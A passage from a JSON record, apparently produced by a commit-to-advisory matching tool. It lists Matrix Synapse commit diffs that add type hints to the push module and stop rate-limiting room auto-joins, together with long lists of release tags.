AlreadyCancelled", - " from synapse.metrics.background_process_metrics import run_as_background_process", - "+from synapse.push import Pusher", - "+from synapse.push.mailer import Mailer", - " from synapse.types import RoomStreamToken", - "+if TYPE_CHECKING:", - "+ from synapse.app.homeserver import HomeServer", - "+", - " logger = logging.getLogger(__name__)", - "@@ -48,3 +55,3 @@ INCLUDE_ALL_UNREAD_NOTIFS = False", - "-class EmailPusher:", - "+class EmailPusher(Pusher):", - " \"\"\"", - "@@ -56,4 +63,4 @@ class EmailPusher:", - "- def __init__(self, hs, pusherdict, mailer):", - "- self.hs = hs", - "+ def __init__(self, hs: \"HomeServer\", pusherdict: Dict[str, Any], mailer: Mailer):", - "+ super().__init__(hs, pusherdict)", - " self.mailer = mailer", - "@@ -61,13 +68,7 @@ class EmailPusher:", - " self.store = self.hs.get_datastore()", - "- self.clock = self.hs.get_clock()", - "- self.pusher_id = pusherdict[\"id\"]", - "- self.user_id = pusherdict[\"user_name\"]", - "- self.app_id = pusherdict[\"app_id\"]", - " self.email = pusherdict[\"pushkey\"]", - " self.last_stream_ordering = pusherdict[\"last_stream_ordering\"]", - "- self.timed_call = None", - "- self.throttle_params = None", - "-", - "- # See httppusher", - "- self.max_stream_ordering = None", - "+ self.timed_call = None # type: Optional[DelayedCall]", - "+ self.throttle_params = {} # type: Dict[str, Dict[str, int]]", - "+ self._inited = False", - "@@ -75,3 +76,3 @@ class EmailPusher:", - "- def on_started(self, should_check_for_notifs):", - "+ def on_started(self, should_check_for_notifs: bool) -> None:", - " \"\"\"Called when this pusher has been started.", - "@@ -79,3 +80,3 @@ class EmailPusher:", - " Args:", - "- should_check_for_notifs (bool): Whether we should immediately", - "+ should_check_for_notifs: Whether we should immediately", - " check for push to send. Set to False only if it's known there", - "@@ -86,3 +87,3 @@ class EmailPusher:", - "- def on_stop(self):", - "+ def on_stop(self) -> None:", - " if self.timed_call:", - "@@ -94,3 +95,3 @@ class EmailPusher:", - "- def on_new_notifications(self, max_token: RoomStreamToken):", - "+ def on_new_notifications(self, max_token: RoomStreamToken) -> None:", - " # We just use the minimum stream ordering and ignore the vector clock", - "@@ -108,3 +109,3 @@ class EmailPusher:", - "- def on_new_receipts(self, min_stream_id, max_stream_id):", - "+ def on_new_receipts(self, min_stream_id: int, max_stream_id: int) -> None:", - " # We could wake up and cancel the timer but there tend to be quite a", - "@@ -114,3 +115,3 @@ class EmailPusher:", - "- def on_timer(self):", - "+ def on_timer(self) -> None:", - " self.timed_call = None", - "@@ -118,3 +119,3 @@ class EmailPusher:", - "- def _start_processing(self):", - "+ def _start_processing(self) -> None:", - " if self._is_processing:", - "@@ -124,3 +125,3 @@ class EmailPusher:", - "- def _pause_processing(self):", - "+ def _pause_processing(self) -> None:", - " \"\"\"Used by tests to temporarily pause processing of events.", - "@@ -132,3 +133,3 @@ class EmailPusher:", - "- def _resume_processing(self):", - "+ def _resume_processing(self) -> None:", - " \"\"\"Used by tests to resume processing of events after pausing.", - "@@ -139,3 +140,3 @@ class EmailPusher:", - "- async def _process(self):", - "+ async def _process(self) -> None:", - " # we should never get here if we are already processing", - "@@ -146,3 +147,3 @@ class EmailPusher:", - "- if self.throttle_params is None:", - "+ if not self._inited:", - " # this is our first loop: load up the throttle params", - "@@ -151,2 +152,3 @@ class EmailPusher:", - " )", - "+ self._inited = True", - "@@ -165,3 +167,3 @@ class EmailPusher:", - "- async def _unsafe_process(self):", - "+ async def _unsafe_process(self) -> None:", - " \"\"\"", - "@@ -172,6 +174,8 @@ class EmailPusher:", - " start = 0 if INCLUDE_ALL_UNREAD_NOTIFS else self.last_stream_ordering", - "- fn = self.store.get_unread_push_actions_for_user_in_range_for_email", - "- unprocessed = await fn(self.user_id, start, self.max_stream_ordering)", - "+ assert self.max_stream_ordering is not None", - "+ unprocessed = await self.store.get_unread_push_actions_for_user_in_range_for_email(", - "+ self.user_id, start, self.max_stream_ordering", - "+ )", - "- soonest_due_at = None", - "+ soonest_due_at = None # type: Optional[int]", - "@@ -232,3 +236,5 @@ class EmailPusher:", - "- async def save_last_stream_ordering_and_success(self, last_stream_ordering):", - "+ async def save_last_stream_ordering_and_success(", - "+ self, last_stream_ordering: Optional[int]", - "+ ) -> None:", - " if last_stream_ordering is None:", - "@@ -250,3 +256,3 @@ class EmailPusher:", - "- def seconds_until(self, ts_msec):", - "+ def seconds_until(self, ts_msec: int) -> float:", - " secs = (ts_msec - self.clock.time_msec()) / 1000", - "@@ -254,3 +260,3 @@ class EmailPusher:", - "- def get_room_throttle_ms(self, room_id):", - "+ def get_room_throttle_ms(self, room_id: str) -> int:", - " if room_id in self.throttle_params:", - "@@ -260,3 +266,3 @@ class EmailPusher:", - "- def get_room_last_sent_ts(self, room_id):", - "+ def get_room_last_sent_ts(self, room_id: str) -> int:", - " if room_id in self.throttle_params:", - "@@ -266,3 +272,3 @@ class EmailPusher:", - "- def room_ready_to_notify_at(self, room_id):", - "+ def room_ready_to_notify_at(self, room_id: str) -> int:", - " \"\"\"", - "@@ -270,4 +276,6 @@ class EmailPusher:", - " for the given room", - "- Returns: The timestamp when we are next allowed to send an email notif", - "- for this room", - "+", - "+ Returns:", - "+ The timestamp when we are next allowed to send an email notif", - "+ for this room", - " \"\"\"", - "@@ -279,3 +287,5 @@ class EmailPusher:", - "- async def sent_notif_update_throttle(self, room_id, notified_push_action):", - "+ async def sent_notif_update_throttle(", - "+ self, room_id: str, notified_push_action: dict", - "+ ) -> None:", - " # We have sent a notification, so update the throttle accordingly.", - "@@ -317,3 +327,3 @@ class EmailPusher:", - "- async def send_notification(self, push_actions, reason):", - "+ async def send_notification(self, push_actions: List[dict], reason: dict) -> None:", - " logger.info(\"Sending notif email for user %r\", self.user_id)", - "diff --git a/synapse/push/httppusher.py b/synapse/push/httppusher.py", - "index 6a0ee8274..5408aa129 100644", - "--- a/synapse/push/httppusher.py", - "+++ b/synapse/push/httppusher.py", - "@@ -17,2 +17,3 @@ import logging", - " import urllib.parse", - "+from typing import TYPE_CHECKING, Any, Dict, Iterable, Union", - "@@ -23,5 +24,6 @@ from twisted.internet.error import AlreadyCalled, AlreadyCancelled", - " from synapse.api.constants import EventTypes", - "+from synapse.events import EventBase", - " from synapse.logging import opentracing", - " from synapse.metrics.background_process_metrics import run_as_background_process", - "-from synapse.push import PusherConfigException", - "+from synapse.push import Pusher, PusherConfigException", - " from synapse.types import RoomStreamToken", - "@@ -30,2 +32,5 @@ from . import push_rule_evaluator, push_tools", - "+if TYPE_CHECKING:", - "+ from synapse.app.homeserver import HomeServer", - "+", - " logger = logging.getLogger(__name__)", - "@@ -53,3 +58,3 @@ http_badges_failed_counter = Counter(", - "-class HttpPusher:", - "+class HttpPusher(Pusher):", - " INITIAL_BACKOFF_SEC = 1 # in seconds because that's what Twisted takes", - "@@ -60,13 +65,7 @@ class HttpPusher:", - "- def __init__(self, hs, pusherdict):", - "- self.hs = hs", - "- self.store = self.hs.get_datastore()", - "+ def __init__(self, hs: \"HomeServer\", pusherdict: Dict[str, Any]):", - "+ super().__init__(hs, pusherdict)", - " self.storage = self.hs.get_storage()", - "- self.clock = self.hs.get_clock()", - "- self.state_handler = self.hs.get_state_handler()", - "- self.user_id = pusherdict[\"user_name\"]", - "- self.app_id = pusherdict[\"app_id\"]", - " self.app_display_name = pusherdict[\"app_display_name\"]", - " self.device_display_name = pusherdict[\"device_display_name\"]", - "- self.pushkey = pusherdict[\"pushkey\"]", - " self.pushkey_ts = pusherdict[\"ts\"]", - "@@ -80,9 +79,2 @@ class HttpPusher:", - "- # This is the highest stream ordering we know it's safe to process.", - "- # When new events arrive, we'll be given a window of new events: we", - "- # should honour this rather than just looking for anything higher", - "- # because of potential out-of-order event serialisation. This starts", - "- # off as None though as we don't know any better.", - "- self.max_stream_ordering = None", - "-", - " if \"data\" not in pusherdict:", - "@@ -121,3 +113,3 @@ class HttpPusher:", - "- def on_started(self, should_check_for_notifs):", - "+ def on_started(self, should_check_for_notifs: bool) -> None:", - " \"\"\"Called when this pusher has been started.", - "@@ -125,3 +117,3 @@ class HttpPusher:", - " Args:", - "- should_check_for_notifs (bool): Whether we should immediately", - "+ should_check_for_notifs: Whether we should immediately", - " check for push to send. Set to False only if it's known there", - "@@ -132,3 +124,3 @@ class HttpPusher:", - "- def on_new_notifications(self, max_token: RoomStreamToken):", - "+ def on_new_notifications(self, max_token: RoomStreamToken) -> None:", - " # We just use the minimum stream ordering and ignore the vector clock", - "@@ -143,3 +135,3 @@ class HttpPusher:", - "- def on_new_receipts(self, min_stream_id, max_stream_id):", - "+ def on_new_receipts(self, min_stream_id: int, max_stream_id: int) -> None:", - " # Note that the min here shouldn't be relied upon to be accurate.", - "@@ -150,3 +142,3 @@ class HttpPusher:", - "- async def _update_badge(self):", - "+ async def _update_badge(self) -> None:", - " # XXX as per https://github.com/matrix-org/matrix-doc/issues/2627, this seems", - "@@ -160,6 +152,6 @@ class HttpPusher:", - "- def on_timer(self):", - "+ def on_timer(self) -> None:", - " self._start_processing()", - "- def on_stop(self):", - "+ def on_stop(self) -> None:", - " if self.timed_call:", - "@@ -171,3 +163,3 @@ class HttpPusher:", - "- def _start_processing(self):", - "+ def _start_processing(self) -> None:", - " if self._is_processing:", - "@@ -177,3 +169,3 @@ class HttpPusher:", - "- async def _process(self):", - "+ async def _process(self) -> None:", - " # we should never get here if we are already processing", - "@@ -196,3 +188,3 @@ class HttpPusher:", - "- async def _unsafe_process(self):", - "+ async def _unsafe_process(self) -> None:", - " \"\"\"", - "@@ -204,2 +196,3 @@ class HttpPusher:", - " fn = self.store.get_unread_push_actions_for_user_in_range_for_http", - "+ assert self.max_stream_ordering is not None", - " unprocessed = await fn(", - "@@ -273,3 +266,3 @@ class HttpPusher:", - " self.last_stream_ordering = push_action[\"stream_ordering\"]", - "- pusher_still_exists = await self.store.update_pusher_last_stream_ordering(", - "+ await self.store.update_pusher_last_stream_ordering(", - " self.app_id,", - "@@ -279,7 +272,2 @@ class HttpPusher:", - " )", - "- if not pusher_still_exists:", - "- # The pusher has been deleted while we were processing, so", - "- # lets just stop and return.", - "- self.on_stop()", - "- return", - "@@ -299,3 +287,3 @@ class HttpPusher:", - "- async def _process_one(self, push_action):", - "+ async def _process_one(self, push_action: dict) -> bool:", - " if \"notify\" not in push_action[\"actions\"]:", - "@@ -330,3 +318,5 @@ class HttpPusher:", - "- async def _build_notification_dict(self, event, tweaks, badge):", - "+ async def _build_notification_dict(", - "+ self, event: EventBase, tweaks: Dict[str, bool], badge: int", - "+ ) -> Dict[str, Any]:", - " priority = \"low\"", - "@@ -360,5 +350,3 @@ class HttpPusher:", - "- ctx = await push_tools.get_context_for_event(", - "- self.storage, self.state_handler, event, self.user_id", - "- )", - "+ ctx = await push_tools.get_context_for_event(self.storage, event, self.user_id)", - "@@ -402,3 +390,5 @@ class HttpPusher:", - "- async def dispatch_push(self, event, tweaks, badge):", - "+ async def dispatch_push(", - "+ self, event: EventBase, tweaks: Dict[str, bool], badge: int", - "+ ) -> Union[bool, Iterable[str]]:", - " notification_dict = await self._build_notification_dict(event, tweaks, badge)", - "diff --git a/synapse/push/push_tools.py b/synapse/push/push_tools.py", - "index 6e7c880dc..df3410322 100644", - "--- a/synapse/push/push_tools.py", - "+++ b/synapse/push/push_tools.py", - "@@ -14,2 +14,5 @@", - " # limitations under the License.", - "+from typing import Dict", - "+", - "+from synapse.events import EventBase", - " from synapse.push.presentable_names import calculate_room_name, name_from_member_event", - "@@ -48,3 +51,5 @@ async def get_badge_count(store: DataStore, user_id: str, group_by_room: bool) -", - "-async def get_context_for_event(storage: Storage, state_handler, ev, user_id):", - "+async def get_context_for_event(", - "+ storage: Storage, ev: EventBase, user_id: str", - "+) -> Dict[str, str]:", - " ctx = {}", - "diff --git a/synapse/push/pusher.py b/synapse/push/pusher.py", - "index 2a52e226e..8f1072b09 100644", - "--- a/synapse/push/pusher.py", - "+++ b/synapse/push/pusher.py", - "@@ -16,7 +16,11 @@", - " import logging", - "+from typing import TYPE_CHECKING, Any, Callable, Dict, Optional", - "+from synapse.push import Pusher", - " from synapse.push.emailpusher import EmailPusher", - "+from synapse.push.httppusher import HttpPusher", - " from synapse.push.mailer import Mailer", - "-from .httppusher import HttpPusher", - "+if TYPE_CHECKING:", - "+ from synapse.app.homeserver import HomeServer", - "@@ -26,3 +30,3 @@ logger = logging.getLogger(__name__)", - " class PusherFactory:", - "- def __init__(self, hs):", - "+ def __init__(self, hs: \"HomeServer\"):", - " self.hs = hs", - "@@ -30,3 +34,5 @@ class PusherFactory:", - "- self.pusher_types = {\"http\": HttpPusher}", - "+ self.pusher_types = {", - "+ \"http\": HttpPusher", - "+ } # type: Dict[str, Callable[[HomeServer, dict], Pusher]]", - "@@ -34,3 +40,3 @@ class PusherFactory:", - " if hs.config.email_enable_notifs:", - "- self.mailers = {} # app_name -> Mailer", - "+ self.mailers = {} # type: Dict[str, Mailer]", - "@@ -43,3 +49,3 @@ class PusherFactory:", - "- def create_pusher(self, pusherdict):", - "+ def create_pusher(self, pusherdict: Dict[str, Any]) -> Optional[Pusher]:", - " kind = pusherdict[\"kind\"]", - "@@ -51,3 +57,5 @@ class PusherFactory:", - "- def _create_email_pusher(self, _hs, pusherdict):", - "+ def _create_email_pusher(", - "+ self, _hs: \"HomeServer\", pusherdict: Dict[str, Any]", - "+ ) -> EmailPusher:", - " app_name = self._app_name_from_pusherdict(pusherdict)", - "@@ -64,3 +72,3 @@ class PusherFactory:", - "- def _app_name_from_pusherdict(self, pusherdict):", - "+ def _app_name_from_pusherdict(self, pusherdict: Dict[str, Any]) -> str:", - " data = pusherdict[\"data\"]", - "diff --git a/synapse/push/pusherpool.py b/synapse/push/pusherpool.py", - "index f32596498..9fcc0b8a6 100644", - "--- a/synapse/push/pusherpool.py", - "+++ b/synapse/push/pusherpool.py", - "@@ -17,3 +17,3 @@", - " import logging", - "-from typing import TYPE_CHECKING, Dict, Union", - "+from typing import TYPE_CHECKING, Any, Dict, Optional", - "@@ -25,5 +25,3 @@ from synapse.metrics.background_process_metrics import (", - " )", - "-from synapse.push import PusherConfigException", - "-from synapse.push.emailpusher import EmailPusher", - "-from synapse.push.httppusher import HttpPusher", - "+from synapse.push import Pusher, PusherConfigException", - " from synapse.push.pusher import PusherFactory", - "@@ -79,3 +77,3 @@ class PusherPool:", - " # map from user id to app_id:pushkey to pusher", - "- self.pushers = {} # type: Dict[str, Dict[str, Union[HttpPusher, EmailPusher]]]", - "+ self.pushers = {} # type: Dict[str, Dict[str, Pusher]]", - "@@ -101,3 +99,3 @@ class PusherPool:", - " profile_tag=\"\",", - "- ):", - "+ ) -> Optional[Pusher]:", - " \"\"\"Creates a new pusher and adds it to the pool", - "@@ -105,3 +103,3 @@ class PusherPool:", - " Returns:", - "- EmailPusher|HttpPusher", - "+ The newly created pusher.", - " \"\"\"", - "@@ -269,3 +267,5 @@ class PusherPool:", - "- async def start_pusher_by_id(self, app_id, pushkey, user_id):", - "+ async def start_pusher_by_id(", - "+ self, app_id: str, pushkey: str, user_id: str", - "+ ) -> Optional[Pusher]:", - " \"\"\"Look up the details for the given pusher, and start it", - "@@ -273,9 +273,9 @@ class PusherPool:", - " Returns:", - "- EmailPusher|HttpPusher|None: The pusher started, if any", - "+ The pusher started, if any", - " \"\"\"", - " if not self._should_start_pushers:", - "- return", - "+ return None", - " if not self._pusher_shard_config.should_handle(self._instance_name, user_id):", - "- return", - "+ return None", - "@@ -305,3 +305,3 @@ class PusherPool:", - "- async def _start_pusher(self, pusherdict):", - "+ async def _start_pusher(self, pusherdict: Dict[str, Any]) -> Optional[Pusher]:", - " \"\"\"Start the given pusher", - "@@ -309,6 +309,6 @@ class PusherPool:", - " Args:", - "- pusherdict (dict): dict with the values pulled from the db table", - "+ pusherdict: dict with the values pulled from the db table", - " Returns:", - "- EmailPusher|HttpPusher", - "+ The newly created pusher or None.", - " \"\"\"", - "@@ -317,3 +317,3 @@ class PusherPool:", - " ):", - "- return", - "+ return None", - "@@ -330,3 +330,3 @@ class PusherPool:", - " )", - "- return", - "+ return None", - " except Exception:", - "@@ -335,6 +335,6 @@ class PusherPool:", - " )", - "- return", - "+ return None", - " if not p:", - "- return", - "+ return None" - ], - "changed_files": [ - "changelog.d/8880.misc", - "mypy.ini", - "synapse/push/__init__.py", - "synapse/push/emailpusher.py", - "synapse/push/httppusher.py", - "synapse/push/push_tools.py", - "synapse/push/pusher.py", - "synapse/push/pusherpool.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8880": "Add type hints to the push module. #8901 Convert internal pusher dicts to attrs #8940 Fix handling of stream tokens for push #8943 Fix-up assertions about last stream token in push #9020" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8880, 8880", - "relevance": 32 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8880", - "relevance": 2 - } - ] - }, - { - "commit_id": "1d55c7b56730f0aeb8a620a22d0994f1dc735dfe", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607681869, - "hunks": 11, - "message": "Don't ratelimit autojoining of rooms (#8921) Fixes #8866", - "diff": [ - "diff --git a/changelog.d/8921.bugfix b/changelog.d/8921.bugfix", - "new file mode 100644", - "index 000000000..7f6f0b8a7", - "--- /dev/null", - "+++ b/changelog.d/8921.bugfix", - "@@ -0,0 +1 @@", - "+Fix bug where we ratelimited auto joining of rooms on registration (using `auto_join_rooms` config).", - "diff --git a/synapse/handlers/room.py b/synapse/handlers/room.py", - "index 930047e73..82fb72b38 100644", - "--- a/synapse/handlers/room.py", - "+++ b/synapse/handlers/room.py", - "@@ -442,2 +442,3 @@ class RoomCreationHandler(BaseHandler):", - " creation_content=creation_content,", - "+ ratelimit=False,", - " )", - "@@ -737,2 +738,3 @@ class RoomCreationHandler(BaseHandler):", - " creator_join_profile=creator_join_profile,", - "+ ratelimit=ratelimit,", - " )", - "@@ -840,2 +842,3 @@ class RoomCreationHandler(BaseHandler):", - " creator_join_profile: Optional[JsonDict] = None,", - "+ ratelimit: bool = True,", - " ) -> int:", - "@@ -886,3 +889,3 @@ class RoomCreationHandler(BaseHandler):", - " \"join\",", - "- ratelimit=False,", - "+ ratelimit=ratelimit,", - " content=creator_join_profile,", - "diff --git a/synapse/handlers/room_member.py b/synapse/handlers/room_member.py", - "index c00288632..d85110a35 100644", - "--- a/synapse/handlers/room_member.py", - "+++ b/synapse/handlers/room_member.py", - "@@ -205,3 +205,3 @@ class RoomMemberHandler(metaclass=abc.ABCMeta):", - " # up blocking profile updates.", - "- if newly_joined:", - "+ if newly_joined and ratelimit:", - " time_now_s = self.clock.time()", - "@@ -490,13 +490,16 @@ class RoomMemberHandler(metaclass=abc.ABCMeta):", - " if not is_host_in_room:", - "- time_now_s = self.clock.time()", - "- (", - "- allowed,", - "- time_allowed,", - "- ) = self._join_rate_limiter_remote.can_requester_do_action(requester,)", - "-", - "- if not allowed:", - "- raise LimitExceededError(", - "- retry_after_ms=int(1000 * (time_allowed - time_now_s))", - "+ if ratelimit:", - "+ time_now_s = self.clock.time()", - "+ (", - "+ allowed,", - "+ time_allowed,", - "+ ) = self._join_rate_limiter_remote.can_requester_do_action(", - "+ requester,", - " )", - "+ if not allowed:", - "+ raise LimitExceededError(", - "+ retry_after_ms=int(1000 * (time_allowed - time_now_s))", - "+ )", - "+", - " inviter = await self._get_inviter(target.to_string(), room_id)", - "diff --git a/tests/rest/client/v1/test_rooms.py b/tests/rest/client/v1/test_rooms.py", - "index e67de41c1..55d872f0e 100644", - "--- a/tests/rest/client/v1/test_rooms.py", - "+++ b/tests/rest/client/v1/test_rooms.py", - "@@ -28,2 +28,3 @@ from synapse.api.constants import EventContentFields, EventTypes, Membership", - " from synapse.handlers.pagination import PurgeStatus", - "+from synapse.rest import admin", - " from synapse.rest.client.v1 import directory, login, profile, room", - "@@ -627,2 +628,3 @@ class RoomJoinRatelimitTestCase(RoomBase):", - " servlets = [", - "+ admin.register_servlets,", - " profile.register_servlets,", - "@@ -705,2 +707,16 @@ class RoomJoinRatelimitTestCase(RoomBase):", - "+ @unittest.override_config(", - "+ {", - "+ \"rc_joins\": {\"local\": {\"per_second\": 0.5, \"burst_count\": 3}},", - "+ \"auto_join_rooms\": [\"#room:red\", \"#room2:red\", \"#room3:red\", \"#room4:red\"],", - "+ \"autocreate_auto_join_rooms\": True,", - "+ },", - "+ )", - "+ def test_autojoin_rooms(self):", - "+ user_id = self.register_user(\"testuser\", \"password\")", - "+", - "+ # Check that the new user successfully joined the four rooms", - "+ rooms = self.get_success(self.hs.get_datastore().get_rooms_for_user(user_id))", - "+ self.assertEqual(len(rooms), 4)", - "+" - ], - "changed_files": [ - "changelog.d/8921.bugfix", - "synapse/handlers/room.py", - "synapse/handlers/room_member.py", - "tests/rest/client/v1/test_rooms.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8921": "", - "8866": "Don't ratelimit autojoining of rooms #8921" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - 